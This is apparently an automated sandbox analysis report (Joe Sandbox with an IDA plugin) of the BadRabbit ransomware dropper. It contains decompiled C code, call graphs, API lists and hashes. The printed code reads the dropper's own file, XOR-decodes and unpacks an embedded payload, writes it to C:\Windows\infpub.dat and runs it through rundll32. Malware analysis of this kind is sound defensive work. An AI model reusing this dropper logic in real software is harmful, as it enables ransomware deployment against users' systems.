                                                                                                                                                  execution_graph 2502 d1f3b 2504 d1f4f 2502->2504 2503 d2012 2505 d2dcb 3 API calls 2503->2505 2507 d1dd2 2503->2507 2504->2503 2506 d1fe4 memcpy 2504->2506 2505->2507 2506->2503 2508 d28d5 2509 d28df 2508->2509 2510 d2dcb 3 API calls 2509->2510 2511 d1dd2 2509->2511 2510->2511 2483 d1be4 2488 d17be 2483->2488 2484 d2a4f 2485 d2dcb 3 API calls 2484->2485 2486 d1dd0 2484->2486 2485->2486 2487 d1b8f memcpy 2487->2488 2488->2484 2488->2486 2488->2487 2489 d33a6 ??3@YAXPAX 2377 d12c0 2397 d1660 2377->2397 2380 d12eb GetCommandLineW CommandLineToArgvW 2381 d1487 2380->2381 2383 d130f 2380->2383 2425 d1499 2381->2425 2385 d1339 wcsstr 2383->2385 2386 d1318 GetSystemDirectoryW 2383->2386 2384 d1495 2385->2386 2386->2381 2388 d13a9 lstrcatW 2386->2388 2388->2381 2389 d13c3 2388->2389 2399 d10c0 GetModuleHandleW GetModuleFileNameW 2389->2399 2391 d13d5 2391->2381 2420 d1260 CreateFileW 2391->2420 2394 d13f9 wsprintfW 2395 d1430 2394->2395 2395->2395 2396 d1449 CreateProcessW ExitProcess 2395->2396 2398 d12cd GetCommandLineW 2397->2398 2398->2380 2398->2381 2400 d110d 2399->2400 2401 d123e 2399->2401 2429 d1000 CreateFileW 2400->2429 2403 d1499 4 API calls 2401->2403 2405 d124b 2403->2405 2404 d1126 2404->2401 2406 d112e GetProcessHeap RtlAllocateHeap 2404->2406 2405->2391 2408 d1189 memcpy 2406->2408 2409 d1225 2406->2409 2411 d119e 2408->2411 2412 d11aa GetProcessHeap RtlAllocateHeap 2408->2412 2410 d1499 4 API calls 2409->2410 2415 d1238 2410->2415 2411->2412 2413 d11e5 GetProcessHeap HeapFree 2412->2413 2414 d11d0 2412->2414 2418 d1499 4 API calls 2413->2418 2438 d1690 2414->2438 2415->2391 2419 d121f 2418->2419 2419->2391 2421 d12aa 2420->2421 2422 d1284 WriteFile 2420->2422 2421->2381 2421->2394 2423 d1299 2422->2423 2424 d12a3 FindCloseChangeNotification 2422->2424 2423->2424 2424->2421 2426 d14a4 SetUnhandledExceptionFilter UnhandledExcep GetCurrentProcess TerminateProcess 2425->2426 2427 d14a1 2425->2427 2426->2384 2427->2384 2430 d102b GetFileSize 2429->2430 2431 d10b5 2429->2431 2432 d1039 GetProcessHeap RtlAllocateHeap 2430->2432 2433 d10a3 FindCloseChangeNotification 2430->2433 2431->2404 2434 d1050 ReadFile 2432->2434 2435 d1091 2432->2435 2433->2404 2434->2435 2436 d106a 2434->2436 2435->2433 2436->2435 2437 d106f GetProcessHeap HeapFree CloseHandle 2436->2437 2437->2404 2443 d2ca1 2438->2443 2442 d16d9 2442->2413 2452 d2c14 2443->2452 2445 d16c9 2445->2442 2446 d173c 2445->2446 2447 d1750 2446->2447 2451 d1dd0 2446->2451 2448 d2a4f 2447->2448 2450 d1b8f memcpy 2447->2450 2447->2451 2448->2451 2457 d2dcb 2448->2457 2450->2447 2451->2442 2453 d2c21 2452->2453 2454 d2c33 2452->2454 2453->2454 2456 d3393 malloc 2453->2456 2454->2445 2456->2454 2458 d2de1 2457->2458 2459 d2e39 memcpy 2458->2459 2460 d2e21 memcpy 2458->2460 2461 d2dfa 2458->2461 2459->2461 2462 d2e58 memcpy 2459->2462 2460->2461 2461->2451 2462->2461

                                                                                                                                                  Callgraph

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                  			E000D10C0(void* __ebx, long* __ecx, void* __edi, void** _a4) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				short _v1568;
                                                                                                                                                  				long _v1572;
                                                                                                                                                  				WCHAR* _v1576;
                                                                                                                                                  				char _v1580;
                                                                                                                                                  				long* _v1584;
                                                                                                                                                  				void** _v1588;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t46;
                                                                                                                                                  				intOrPtr _t47;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				intOrPtr _t49;
                                                                                                                                                  				void* _t52;
                                                                                                                                                  				long _t56;
                                                                                                                                                  				void* _t58;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  				int _t65;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				int _t67;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				intOrPtr _t69;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				long _t76;
                                                                                                                                                  				void* _t77;
                                                                                                                                                  				void _t85;
                                                                                                                                                  				void* _t89;
                                                                                                                                                  				void* _t91;
                                                                                                                                                  				void* _t92;
                                                                                                                                                  				void* _t95;
                                                                                                                                                  				void* _t97;
                                                                                                                                                  				signed int _t98;
                                                                                                                                                  
                                                                                                                                                  				_t89 = __edi;
                                                                                                                                                  				_t66 = __ebx;
                                                                                                                                                  				_v8 =  *0xd8000 ^ _t98;
                                                                                                                                                  				_t86 =  &_v1568;
                                                                                                                                                  				_v1588 = _a4;
                                                                                                                                                  				_v1584 = __ecx;
                                                                                                                                                  				_v1576 = 0;
                                                                                                                                                  				if(GetModuleFileNameW(GetModuleHandleW(0),  &_v1568, 0x30c) == 0) {
                                                                                                                                                  					L17:
                                                                                                                                                  					return E000D1499(0, _t66, _v8 ^ _t98, _t86, _t89, 0);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t46 = E000D1000( &_v1568,  &_v1572,  &_v1580); // executed
                                                                                                                                                  					if(_t46 == 0) {
                                                                                                                                                  						goto L17;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t76 = _v1572;
                                                                                                                                                  						_t47 =  *((intOrPtr*)(_t76 + 0x3c));
                                                                                                                                                  						_t48 = _t47 + _t76;
                                                                                                                                                  						_t77 = ( *(_t47 + _t76 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                                                                                  						_t88 =  *(_t48 + 6) & 0x0000ffff;
                                                                                                                                                  						if(_t88 > 0) {
                                                                                                                                                  							_t77 = _t77 + _t88 * 8;
                                                                                                                                                  						}
                                                                                                                                                  						_t49 =  *((intOrPtr*)(_t48 + 0x98));
                                                                                                                                                  						_push(_t89);
                                                                                                                                                  						_t91 =  *((intOrPtr*)(_t77 - 0x28 + 0x14)) +  *((intOrPtr*)(_t77 - 0x28 + 0x10));
                                                                                                                                                  						if(_t49 == 0) {
                                                                                                                                                  							_t49 = _v1580;
                                                                                                                                                  						}
                                                                                                                                                  						_push(_t66);
                                                                                                                                                  						_t67 = _t49 - _t91;
                                                                                                                                                  						_t52 = RtlAllocateHeap(GetProcessHeap(), 0, _t67); // executed
                                                                                                                                                  						_t97 = _t52;
                                                                                                                                                  						if(_t97 == 0) {
                                                                                                                                                  							_pop(_t68);
                                                                                                                                                  							_pop(_t92);
                                                                                                                                                  							return E000D1499(_v1576, _t68, _v8 ^ _t98, _t88, _t92, _t97);
                                                                                                                                                  						} else {
                                                                                                                                                  							memcpy(_t97, _t91 + _v1572, _t67);
                                                                                                                                                  							if(_t67 != 0) {
                                                                                                                                                  								_t85 =  *_t97;
                                                                                                                                                  								_t65 = _t67;
                                                                                                                                                  								do {
                                                                                                                                                  									_t85 = _t85 ^ 0x000000e9;
                                                                                                                                                  									_t65 = _t65 - 1;
                                                                                                                                                  								} while (_t65 != 0);
                                                                                                                                                  								 *_t97 = _t85;
                                                                                                                                                  							}
                                                                                                                                                  							_t56 =  *_t97;
                                                                                                                                                  							_v1572 = _t56;
                                                                                                                                                  							_t58 = RtlAllocateHeap(GetProcessHeap(), 8, _t56); // executed
                                                                                                                                                  							 *_v1588 = _t58;
                                                                                                                                                  							if(_t58 == 0) {
                                                                                                                                                  								L14:
                                                                                                                                                  								_t69 = _v1576;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t28 = _t97 + 4; // 0x4
                                                                                                                                                  								_t88 = _t28;
                                                                                                                                                  								_t63 = E000D1690(_t58,  &_v1572, _t28, _t67 + 0xfffffffc); // executed
                                                                                                                                                  								if(_t63 != 0) {
                                                                                                                                                  									goto L14;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t88 = _v1572;
                                                                                                                                                  									 *_v1584 = _v1572;
                                                                                                                                                  									_t69 = 1;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							HeapFree(GetProcessHeap(), 0, _t97);
                                                                                                                                                  							_pop(_t70);
                                                                                                                                                  							_pop(_t95);
                                                                                                                                                  							return E000D1499(_t69, _t70, _v8 ^ _t98, _t88, _t95, _t97);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}


































                                                                                                                                                  0x000d10c0
                                                                                                                                                  0x000d10c0
                                                                                                                                                  0x000d10d0
                                                                                                                                                  0x000d10dc
                                                                                                                                                  0x000d10e6
                                                                                                                                                  0x000d10ec
                                                                                                                                                  0x000d10f2
                                                                                                                                                  0x000d1107
                                                                                                                                                  0x000d123e
                                                                                                                                                  0x000d124e
                                                                                                                                                  0x000d110d
                                                                                                                                                  0x000d1121
                                                                                                                                                  0x000d1128
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d112e
                                                                                                                                                  0x000d112e
                                                                                                                                                  0x000d1134
                                                                                                                                                  0x000d113c
                                                                                                                                                  0x000d113e
                                                                                                                                                  0x000d1142
                                                                                                                                                  0x000d1148
                                                                                                                                                  0x000d114d
                                                                                                                                                  0x000d114d
                                                                                                                                                  0x000d1150
                                                                                                                                                  0x000d1159
                                                                                                                                                  0x000d115d
                                                                                                                                                  0x000d1162
                                                                                                                                                  0x000d1164
                                                                                                                                                  0x000d1164
                                                                                                                                                  0x000d116a
                                                                                                                                                  0x000d116d
                                                                                                                                                  0x000d1179
                                                                                                                                                  0x000d117f
                                                                                                                                                  0x000d1183
                                                                                                                                                  0x000d122b
                                                                                                                                                  0x000d122c
                                                                                                                                                  0x000d123b
                                                                                                                                                  0x000d1189
                                                                                                                                                  0x000d1192
                                                                                                                                                  0x000d119c
                                                                                                                                                  0x000d119e
                                                                                                                                                  0x000d11a0
                                                                                                                                                  0x000d11a2
                                                                                                                                                  0x000d11a2
                                                                                                                                                  0x000d11a5
                                                                                                                                                  0x000d11a5
                                                                                                                                                  0x000d11a8
                                                                                                                                                  0x000d11a8
                                                                                                                                                  0x000d11aa
                                                                                                                                                  0x000d11b5
                                                                                                                                                  0x000d11be
                                                                                                                                                  0x000d11ca
                                                                                                                                                  0x000d11ce
                                                                                                                                                  0x000d11fe
                                                                                                                                                  0x000d11fe
                                                                                                                                                  0x000d11d0
                                                                                                                                                  0x000d11d4
                                                                                                                                                  0x000d11d4
                                                                                                                                                  0x000d11e0
                                                                                                                                                  0x000d11e7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d11e9
                                                                                                                                                  0x000d11e9
                                                                                                                                                  0x000d11f5
                                                                                                                                                  0x000d11f7
                                                                                                                                                  0x000d11f7
                                                                                                                                                  0x000d11e7
                                                                                                                                                  0x000d120a
                                                                                                                                                  0x000d1212
                                                                                                                                                  0x000d1213
                                                                                                                                                  0x000d1222
                                                                                                                                                  0x000d1222
                                                                                                                                                  0x000d1183
                                                                                                                                                  0x000d1128

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 000D10F8
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000), ref: 000D10FF
                                                                                                                                                    • Part of subcall function 000D1000: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 000D101A
                                                                                                                                                    • Part of subcall function 000D1000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 000D102D
                                                                                                                                                    • Part of subcall function 000D1000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 000D103D
                                                                                                                                                    • Part of subcall function 000D1000: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 000D1044
                                                                                                                                                    • Part of subcall function 000D1000: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 000D1060
                                                                                                                                                    • Part of subcall function 000D1000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 000D1071
                                                                                                                                                    • Part of subcall function 000D1000: HeapFree.KERNEL32(00000000,?,?), ref: 000D1078
                                                                                                                                                    • Part of subcall function 000D1000: CloseHandle.KERNEL32(00000000,?), ref: 000D1080
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 000D1172
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,?), ref: 000D1179
                                                                                                                                                  • memcpy.MSVCRT ref: 000D1192
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 000D11BB
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 000D11BE
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1207
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 000D120A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$File$Allocate$FreeHandleModule$CloseCreateNameReadSizememcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3076684055-0
                                                                                                                                                  • Opcode ID: 389f3fce2abb82d8c04cf03de857d0221fcf010a8e91c0af47424437e65d8224
                                                                                                                                                  • Instruction ID: 44509056971a360379bf69d49621e9b442534b8c92223d7d6f278c5df598890a
                                                                                                                                                  • Opcode Fuzzy Hash: 389f3fce2abb82d8c04cf03de857d0221fcf010a8e91c0af47424437e65d8224
                                                                                                                                                  • Instruction Fuzzy Hash: C5417272A01218ABDB20DFA9DC44AEAB7B9FF98310F14419AE905D7341DA31DD55CFB0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 d12c0-d12e5 call d1660 GetCommandLineW 3 d12eb-d1309 GetCommandLineW CommandLineToArgvW 0->3 4 d1487-d1498 call d1499 0->4 3->4 6 d130f-d1316 3->6 8 d1339-d134b wcsstr 6->8 9 d1318-d131a 6->9 10 d1350-d1359 8->10 11 d1320-d1335 9->11 10->10 13 d135b-d1367 10->13 11->11 12 d1337 11->12 14 d138f-d13a3 GetSystemDirectoryW 12->14 15 d136c-d1370 13->15 16 d1369 13->16 14->4 19 d13a9-d13bd lstrcatW 14->19 17 d1375-d137d 15->17 18 d1372 15->18 16->15 20 d1380-d138d 17->20 18->17 19->4 21 d13c3-d13d7 call d10c0 19->21 20->14 20->20 21->4 24 d13dd-d13f3 call d1260 21->24 24->4 27 d13f9-d142c wsprintfW 24->27 28 d1430-d1435 27->28 28->28 29 d1437-d143c 28->29 30 d1442-d1447 29->30 30->30 31 d1449-d1481 CreateProcessW ExitProcess 30->31
                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                  			_entry_(void* __ebx) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				short _v1568;
                                                                                                                                                  				short _v3128;
                                                                                                                                                  				char _v4688;
                                                                                                                                                  				int _v4692;
                                                                                                                                                  				char _v4696;
                                                                                                                                                  				char _v4700;
                                                                                                                                                  				struct _PROCESS_INFORMATION _v4716;
                                                                                                                                                  				struct _STARTUPINFOW _v4784;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				wchar_t* _t43;
                                                                                                                                                  				signed short* _t44;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				void* _t49;
                                                                                                                                                  				char* _t52;
                                                                                                                                                  				char* _t53;
                                                                                                                                                  				void* _t56;
                                                                                                                                                  				void* _t57;
                                                                                                                                                  				wchar_t* _t61;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				signed int _t64;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t70;
                                                                                                                                                  				signed int _t72;
                                                                                                                                                  				long _t74;
                                                                                                                                                  				wchar_t* _t78;
                                                                                                                                                  				wchar_t** _t79;
                                                                                                                                                  				signed int _t80;
                                                                                                                                                  				void* _t81;
                                                                                                                                                  
                                                                                                                                                  				_t57 = __ebx;
                                                                                                                                                  				E000D1660(0x12ac);
                                                                                                                                                  				_v8 =  *0xd8000 ^ _t80;
                                                                                                                                                  				_t79 = GetCommandLineW;
                                                                                                                                                  				_t78 = GetCommandLineW();
                                                                                                                                                  				if(_t78 != 0) {
                                                                                                                                                  					_v4692 = 0;
                                                                                                                                                  					_t79 = CommandLineToArgvW(GetCommandLineW(),  &_v4692);
                                                                                                                                                  					if(_t79 != 0) {
                                                                                                                                                  						if(_v4692 != 1) {
                                                                                                                                                  							_t43 = wcsstr(_t78,  *_t79);
                                                                                                                                                  							_t61 =  *_t79;
                                                                                                                                                  							_t81 = _t81 + 8;
                                                                                                                                                  							_t79 =  &(_t61[0]);
                                                                                                                                                  							do {
                                                                                                                                                  								_t74 =  *_t61;
                                                                                                                                                  								_t61 =  &(_t61[0]);
                                                                                                                                                  							} while (_t74 != 0);
                                                                                                                                                  							_t63 = _t61 - _t79 >> 1;
                                                                                                                                                  							_t44 = _t43 + _t63 * 2;
                                                                                                                                                  							if( *(_t43 + _t63 * 2) == 0x22) {
                                                                                                                                                  								_t44 =  &(_t44[1]);
                                                                                                                                                  							}
                                                                                                                                                  							if( *_t44 == 0x20) {
                                                                                                                                                  								_t44 =  &(_t44[1]);
                                                                                                                                                  							}
                                                                                                                                                  							_t73 =  &_v4688 - _t44;
                                                                                                                                                  							do {
                                                                                                                                                  								_t64 =  *_t44 & 0x0000ffff;
                                                                                                                                                  								 *(_t73 + _t44) = _t64;
                                                                                                                                                  								_t44 =  &(_t44[1]);
                                                                                                                                                  							} while (_t64 != 0);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t56 = 0;
                                                                                                                                                  							do {
                                                                                                                                                  								_t5 = _t56 + 0xd6cf0; // 0x350031
                                                                                                                                                  								_t72 =  *_t5 & 0x0000ffff;
                                                                                                                                                  								 *(_t80 + _t56 - 0x124c) = _t72;
                                                                                                                                                  								_t56 = _t56 + 2;
                                                                                                                                                  							} while (_t72 != 0);
                                                                                                                                                  						}
                                                                                                                                                  						if(GetSystemDirectoryW( &_v1568, 0x30c) != 0) {
                                                                                                                                                  							_t73 =  &_v1568;
                                                                                                                                                  							if(lstrcatW( &_v1568, L"\\rundll32.exe") != 0) {
                                                                                                                                                  								_t48 = E000D10C0(_t57,  &_v4696, _t78,  &_v4700); // executed
                                                                                                                                                  								if(_t48 != 0) {
                                                                                                                                                  									_t49 = E000D1260(_v4696, _v4700); // executed
                                                                                                                                                  									_t57 = _t57;
                                                                                                                                                  									if(_t49 != 0) {
                                                                                                                                                  										wsprintfW( &_v3128, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1568, L"infpub.dat",  &_v4688);
                                                                                                                                                  										_t69 = 0x10;
                                                                                                                                                  										_t52 =  &_v4716;
                                                                                                                                                  										do {
                                                                                                                                                  											 *_t52 = 0;
                                                                                                                                                  											_t52 = _t52 + 1;
                                                                                                                                                  											_t69 = _t69 - 1;
                                                                                                                                                  										} while (_t69 != 0);
                                                                                                                                                  										_t70 = 0x44;
                                                                                                                                                  										_t53 =  &_v4784;
                                                                                                                                                  										do {
                                                                                                                                                  											 *_t53 = 0;
                                                                                                                                                  											_t53 = _t53 + 1;
                                                                                                                                                  											_t70 = _t70 - 1;
                                                                                                                                                  										} while (_t70 != 0);
                                                                                                                                                  										_t73 =  &_v1568;
                                                                                                                                                  										_v4784.cb = 0x44;
                                                                                                                                                  										CreateProcessW( &_v1568,  &_v3128, _t70, _t70, _t70, 0x8000000, _t70, _t70,  &_v4784,  &_v4716); // executed
                                                                                                                                                  										ExitProcess(0); // executed
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return E000D1499(0, _t57, _v8 ^ _t80, _t73, _t78, _t79);
                                                                                                                                                  			}

































                                                                                                                                                  0x000d12c0
                                                                                                                                                  0x000d12c8
                                                                                                                                                  0x000d12d4
                                                                                                                                                  0x000d12d8
                                                                                                                                                  0x000d12e1
                                                                                                                                                  0x000d12e5
                                                                                                                                                  0x000d12f2
                                                                                                                                                  0x000d1305
                                                                                                                                                  0x000d1309
                                                                                                                                                  0x000d1316
                                                                                                                                                  0x000d133d
                                                                                                                                                  0x000d1343
                                                                                                                                                  0x000d1345
                                                                                                                                                  0x000d1348
                                                                                                                                                  0x000d1350
                                                                                                                                                  0x000d1350
                                                                                                                                                  0x000d1353
                                                                                                                                                  0x000d1356
                                                                                                                                                  0x000d135d
                                                                                                                                                  0x000d1364
                                                                                                                                                  0x000d1367
                                                                                                                                                  0x000d1369
                                                                                                                                                  0x000d1369
                                                                                                                                                  0x000d1370
                                                                                                                                                  0x000d1372
                                                                                                                                                  0x000d1372
                                                                                                                                                  0x000d137b
                                                                                                                                                  0x000d1380
                                                                                                                                                  0x000d1380
                                                                                                                                                  0x000d1383
                                                                                                                                                  0x000d1387
                                                                                                                                                  0x000d138a
                                                                                                                                                  0x000d1318
                                                                                                                                                  0x000d1318
                                                                                                                                                  0x000d1320
                                                                                                                                                  0x000d1320
                                                                                                                                                  0x000d1320
                                                                                                                                                  0x000d1327
                                                                                                                                                  0x000d132f
                                                                                                                                                  0x000d1332
                                                                                                                                                  0x000d1337
                                                                                                                                                  0x000d13a3
                                                                                                                                                  0x000d13ae
                                                                                                                                                  0x000d13bd
                                                                                                                                                  0x000d13d0
                                                                                                                                                  0x000d13d7
                                                                                                                                                  0x000d13eb
                                                                                                                                                  0x000d13f0
                                                                                                                                                  0x000d13f3
                                                                                                                                                  0x000d1418
                                                                                                                                                  0x000d1421
                                                                                                                                                  0x000d1426
                                                                                                                                                  0x000d1430
                                                                                                                                                  0x000d1430
                                                                                                                                                  0x000d1433
                                                                                                                                                  0x000d1434
                                                                                                                                                  0x000d1434
                                                                                                                                                  0x000d1437
                                                                                                                                                  0x000d143c
                                                                                                                                                  0x000d1442
                                                                                                                                                  0x000d1442
                                                                                                                                                  0x000d1445
                                                                                                                                                  0x000d1446
                                                                                                                                                  0x000d1446
                                                                                                                                                  0x000d1468
                                                                                                                                                  0x000d146f
                                                                                                                                                  0x000d1479
                                                                                                                                                  0x000d1481
                                                                                                                                                  0x000d1481
                                                                                                                                                  0x000d13f3
                                                                                                                                                  0x000d13d7
                                                                                                                                                  0x000d13bd
                                                                                                                                                  0x000d13a3
                                                                                                                                                  0x000d1309
                                                                                                                                                  0x000d1498

                                                                                                                                                  APIs
                                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 000D12DF
                                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 000D12FC
                                                                                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 000D12FF
                                                                                                                                                  • wcsstr.MSVCRT ref: 000D133D
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 000D139B
                                                                                                                                                  • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 000D13B5
                                                                                                                                                  • wsprintfW.USER32 ref: 000D1418
                                                                                                                                                  • CreateProcessW.KERNELBASE ref: 000D1479
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 000D1481
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CommandLine$Process$ArgvCreateDirectoryExitSystemlstrcatwcsstrwsprintf
                                                                                                                                                  • String ID: %ws C:\Windows\%ws,#1 %ws$D$\rundll32.exe$infpub.dat
                                                                                                                                                  • API String ID: 39178828-1758013632
                                                                                                                                                  • Opcode ID: 8ab7a5e4638a25d0677f1295349e146c1aa7aa257acf3d680dc34bb0c3470f3d
                                                                                                                                                  • Instruction ID: 0cda339be1561cb6ed7626bacc4f3fff39ad2fa7556c3361b569fe8bb3727c47
                                                                                                                                                  • Opcode Fuzzy Hash: 8ab7a5e4638a25d0677f1295349e146c1aa7aa257acf3d680dc34bb0c3470f3d
                                                                                                                                                  • Instruction Fuzzy Hash: F341A171901318ABDB24DB94CC95BEA77B9EF44740F04429AEA06D7290EF74AE64CF70
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E000D1000(WCHAR* __eax, void** _a4, long* _a8) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				DWORD* _v12;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				long _t18;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				void* _t28;
                                                                                                                                                  				long _t32;
                                                                                                                                                  
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_t11 = CreateFileW(__eax, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                                                                  				_t24 = _t11;
                                                                                                                                                  				if(_t24 == 0xffffffff) {
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t32 = GetFileSize(_t24, 0);
                                                                                                                                                  					if(_t32 == 0) {
                                                                                                                                                  						L8:
                                                                                                                                                  						FindCloseChangeNotification(_t24); // executed
                                                                                                                                                  						return _v12;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t17 = RtlAllocateHeap(GetProcessHeap(), 0, _t32); // executed
                                                                                                                                                  						_t28 = _t17;
                                                                                                                                                  						if(_t28 == 0) {
                                                                                                                                                  							L7:
                                                                                                                                                  							goto L8;
                                                                                                                                                  						} else {
                                                                                                                                                  							_v8 = 0;
                                                                                                                                                  							_t18 = ReadFile(_t24, _t28, _t32,  &_v8, 0); // executed
                                                                                                                                                  							if(_t18 != 0 || _v8 != _t32) {
                                                                                                                                                  								 *_a4 = _t28;
                                                                                                                                                  								 *_a8 = _t32;
                                                                                                                                                  								_v12 = 1;
                                                                                                                                                  								goto L7;
                                                                                                                                                  							} else {
                                                                                                                                                  								HeapFree(GetProcessHeap(), _t18, _t28);
                                                                                                                                                  								CloseHandle(_t24);
                                                                                                                                                  								return _v12;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}











                                                                                                                                                  0x000d1017
                                                                                                                                                  0x000d101a
                                                                                                                                                  0x000d1020
                                                                                                                                                  0x000d1025
                                                                                                                                                  0x000d10bc
                                                                                                                                                  0x000d102b
                                                                                                                                                  0x000d1033
                                                                                                                                                  0x000d1037
                                                                                                                                                  0x000d10a3
                                                                                                                                                  0x000d10a4
                                                                                                                                                  0x000d10b2
                                                                                                                                                  0x000d1039
                                                                                                                                                  0x000d1044
                                                                                                                                                  0x000d104a
                                                                                                                                                  0x000d104e
                                                                                                                                                  0x000d10a2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d1050
                                                                                                                                                  0x000d1059
                                                                                                                                                  0x000d1060
                                                                                                                                                  0x000d1068
                                                                                                                                                  0x000d1097
                                                                                                                                                  0x000d1099
                                                                                                                                                  0x000d109b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d106f
                                                                                                                                                  0x000d1078
                                                                                                                                                  0x000d1080
                                                                                                                                                  0x000d108e
                                                                                                                                                  0x000d108e
                                                                                                                                                  0x000d1068
                                                                                                                                                  0x000d104e
                                                                                                                                                  0x000d1037

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 000D101A
                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 000D102D
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 000D103D
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 000D1044
                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 000D1060
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 000D1071
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 000D1078
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?), ref: 000D1080
